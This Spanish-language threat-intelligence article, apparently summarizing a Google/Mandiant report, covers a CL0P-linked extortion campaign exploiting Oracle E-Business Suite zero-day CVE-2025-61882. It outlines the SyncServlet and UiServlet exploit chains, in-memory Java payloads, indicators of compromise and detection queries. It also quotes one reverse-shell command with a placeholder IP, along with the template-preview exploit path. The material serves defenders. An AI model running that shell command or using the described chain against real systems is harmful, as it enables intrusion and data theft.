GTIG (Google Threat Intelligence Group) y Mandiant han destapado una campaña de extorsión a gran escala que aprovecha una vulnerabilidad de día cero en Oracle E-Business Suite (EBS). El actor —que reivindica afinidad con la marca CL0P— habría empezado a enviar correos de extorsión el 29 de septiembre de 2025 a ejecutivos de numerosas organizaciones, tras meses de intrusión silenciosa y exfiltración de datos. Oracle ha publicado parches de emergencia y recomienda aplicarlos de inmediato.
Según GTIG y Mandiant, la explotación se remonta al 9 de agosto de 2025, con indicios de actividad sospechosa ya el 10 de julio. Oracle asocia la campaña a CVE-2025-61882 (puntuación CVSS 9,8) y, el 4 de octubre, emitió actualizaciones críticas para cerrar la brecha, instando a mantener EBS al día con los Critical Patch Updates.
Un viejo modus operandi con nuevas presas
El patrón encaja con campañas históricas ligadas al ecosistema CL0P: explotación masiva de 0-days (antes en plataformas MFT como Accellion FTA, GoAnywhere, MOVEit o Cleo), robo de datos y extorsión diferida semanas después. La novedad es el foco en Oracle EBS, un aplicativo ERP crítico que centraliza finanzas, compras, RR. HH. y otros procesos de negocio. Atacar EBS eleva el impacto porque muchas veces no requiere moverse lateralmente: los datos sensibles ya residen en el propio entorno comprometido.
Aunque no hay atribución formal, GTIG y Mandiant señalan solapamientos técnicos con FIN11 (campañas anteriores y uso de herramientas relacionadas, como GOLDVEIN/GOLDTOMB), además de tácticas y marcadores en línea con operaciones CL0P. El correo de contacto de extorsión incluye direcciones usadas por ese ecosistema, y parte del correo masivo se habría enviado desde cuentas de terceros comprometidas, adquiridas en foros con logs de infostealers.
Qué explotan y cómo: UiServlet y SyncServlet en el centro del huracán
Los equipos de respuesta han observado dos vías principales contra EBS:
- Cadena contra UiServlet (
/OA_HTML/configurator/UiServlet
), con técnicas combinadas: SSRF, CRLF injection, bypass de autenticación e inyección de XSL para lograr RCE (ejecución remota de código) tanto en Linux (víabash
) como en Windows (víacmd.exe
). - Cadena contra SyncServlet (
/OA_HTML/SyncServlet
) que no requiere autenticación y permite RCE a través del XDO Template Manager para crear plantillas maliciosas en base de datos y dispararlas desde la vista previa de plantillas.
En la vía de SyncServlet, la secuencia típica es:
- POST a
/OA_HTML/SyncServlet
. - Creación de una plantilla XDO maliciosa (almacenada en XDO_TEMPLATES_B y XDO_LOBS), con TEMPLATE_CODE que empieza por
TMP
oDEF
. - Activación del payload con Template Preview en una ruta como:
/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=<TMP|DEF><hex>&TemplateType=<XSL-TEXT|XML>…
Dentro de la plantilla, los atacantes insertan XSL malicioso con código Java embebido (base64) que carga nuevas etapas en memoria.
Cadena de payloads observada
Se han visto dos familias principales embebidas en esas plantillas XSL:
- GOLDVEIN.JAVA (descargador): variante Java de GOLDVEIN, que se conecta a C2 para traer la segunda etapa. Enmascara la comunicación como un falso “TLSv3.1” y devuelve resultados de comandos en comentarios HTML.
- Cadena SAGE* (SAGEGIFT → SAGELEAF → SAGEWAVE):
- SAGEGIFT: loader Java reflectivo (orientado a WebLogic).
- SAGELEAF: dropper en memoria, instala SAGEWAVE.
- SAGEWAVE: filtro de servlet persistente que despliega un ZIP AES-cifrado con clases Java adicionales (el payload principal se sospecha similar a módulos vistos en GOLDTOMB).
- Variantes de SAGEWAVE filtran por cabecera
X-ORACLE-DMS-ECID
con valor fijo y rutas HTTP específicas (/help/...
y/support/...
) para activar funciones.
Tras el RCE, los atacantes ejecutan reconocimiento desde la cuenta applmgr
: df -h
, ip addr
, netstat -an
, ps -aux
, consultas a /etc/hosts
, /etc/fstab
, resolución ARP, pings y shell inversos tipo bash -i >& /dev/tcp/<IP>/<puerto> 0>&1
.
Extorsión: qué reciben las víctimas
Las cartas de extorsión incluyen listados reales de ficheros extraídos de EBS para dar credibilidad. Piden a los supuestos afectados contactar a correos operados por el grupo y negociar para evitar la filtración. Sin embargo, siguiendo el patrón de campañas previas, no suelen publicar víctimas de inmediato en el DLS (Data Leak Site) de CL0P; esperan semanas para elevar presión y negociar en privado.
Impacto: por qué EBS es un objetivo tan jugoso
- Concentración de datos sensibles: EBS aglutina documentos financieros, información de empleados, contratos, pedidos, proveedores, etc.
- Acceso directo: comprometer EBS minimiza la necesidad de pivotar por la red.
- Exfiltración silenciosa: con payloads en memoria y filtros que devuelven respuestas “escondidas” en comentarios HTML, aumenta la posibilidad de pasar desapercibidos.
Qué deben hacer ya los responsables de EBS
1) Parchear con prioridad máxima.
Aplicar sin demora los parches de 4 de octubre de 2025 y ponerse al día en Critical Patch Updates. La ventana de exposición se reduce drásticamente al cerrar CVE-2025-61882 y cadenas relacionadas.
2) Cazar plantillas maliciosas en base de datos.
Buscar en XDO_TEMPLATES_B y XDO_LOBS creaciones recientes y códigos que empiecen por TMP
o DEF
. Revisar especialmente LOB_CODE (donde se aloja el payload).
Consultas de partida:
SELECT * FROM XDO_TEMPLATES_B ORDER BY CREATION_DATE DESC;
SELECT * FROM XDO_LOBS ORDER BY CREATION_DATE DESC;
3) Restringir salidas a Internet desde servidores EBS.
Bloquear todo tráfico saliente no esencial. Estas cadenas necesitan conectividad C2 para descargar etapas o exfiltrar. Un egress mínimo rompe la cadena incluso si el host se ha visto comprometido.
4) Vigilar logs y patrones de IOCs.
- Accesos a TemplatePreviewPG con
TemplateCode
que comienza porTMP
/DEF
. - Peticiones a
/OA_HTML/configurator/UiServlet
y/OA_HTML/SyncServlet
. - Rutas /help/ y /support/ con patrones iHelp/navId/navvSetId que activan SAGEWAVE.
- Aparición de bash hijo de Java/EBS ejecutando comandos.
5) Forense de memoria en procesos Java.
Los implantes son Java en memoria. Si se sospecha compromiso, volcados de memoria y búsqueda de clases cargadas dinámicamente pueden revelar inyecciones que no dejan rastro en disco.
6) Revisar correo y dominios de extorsión.
Correos desde cuentas legítimas robadas con destinos directivos; dirección de contacto operativa ligada a CL0P. Formación y playbooks de respuesta sin pagar y con asesoría legal son críticos.
Indicadores y patrones a monitorizar
- IPs vistas en la actividad: 200.107.207.26, 161.97.99.49.
- Posibles C2 de GOLDVEIN.JAVA: 162.55.17.215:443, 104.194.11.200:443.
- Endpoints:
/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG...
/OA_HTML/configurator/UiServlet
/OA_HTML/SyncServlet
- Subcadenas:
/help/state/content/destination./navId.1/navvSetId.iHelp/
y/support/state/content/destination./navId.1/navvSetId.iHelp/
- Cuentas: actividad de
applmgr
lanzando bash desde procesos Java. - Señales de exfiltración: tráfico saliente “similar a TLS” con patrones anómalos, comentarios HTML con resultados de comandos.
Por qué esta campaña preocupa a medio plazo
- Economía de escala: el actor optimiza su inversión atacando un aplicativo ampliamente desplegado en grandes organizaciones.
- Baja fricción operativa: la marca CL0P aporta histórico y presión psicológica; el uso de cuentas comprometidas de terceros mejora entregabilidad de correos.
- Tácticas reutilizables: las cadenas XSL/Java y los filtros WebLogic pueden mutar y migrar a otros productos Oracle o middlewares similares.
- Más 0-days: la campaña refuerza la lectura de que estos grupos seguirán comprando/explotando 0-days en aplicaciones empresariales expuestas.
Recomendaciones rápidas para CIO/CISO y equipos SOC
- Inventario y exposición: confirmar todos los EBS expuestos y su estado de parches.
- Egress por defecto denegado en servidores aplicativos; abrir solo lo estrictamente necesario.
- Reglas WAF/IDS específicas para los endpoints citados y patrones de TemplateCode.
- Búsquedas periódicas en base de datos de plantillas XDO con prefijos
TMP/DEF
y creación reciente. - Higiene de logs: conservar y centralizar access logs de EBS con suficiente retención para correlación.
- Simular extorsión: ejercicios de respuesta —legales, comunicaciones, negociación técnica— antes de que llegue el correo real.
- No pagar: mantener la política y coordinar con Fuerzas y Cuerpos de Seguridad y certs nacionales.
Preguntas frecuentes (FAQ)
¿Estoy afectado si apliqué los parches de octubre?
Si su instancia EBS está al día, el riesgo de explotación conocida se reduce drásticamente. Aun así, revise indicadores (plantillas XDO maliciosas, endpoints, tráfico saliente) por si hubo compromiso previo a parchear.
¿Cómo detecto si ya me insertaron una plantilla maliciosa?
Consulte XDO_TEMPLATES_B
y XDO_LOBS
ordenando por fecha de creación y filtrando TEMPLATE_CODE
con prefijos TMP
/DEF
. Inspeccione LOB_CODE
en busca de XSL que decodifique base64 y cargue clases Java.
¿Basta con bloquear el tráfico saliente?
No “cura” el servidor, pero corta la segunda etapa y dificulta la exfiltración. Es un control compensatorio esencial además del parcheado y la limpieza de artefactos en base de datos.
¿Debo asumir filtración de datos si veo actividad?
La campaña incluye exfiltración en varios casos. Si encuentra Iocs o plantillas maliciosas, active forense, evaluación de impacto (qué tablas y módulos se tocaron), obligaciones regulatorias y comunicaciones con afectados según su marco legal.
vía: cloud.google.com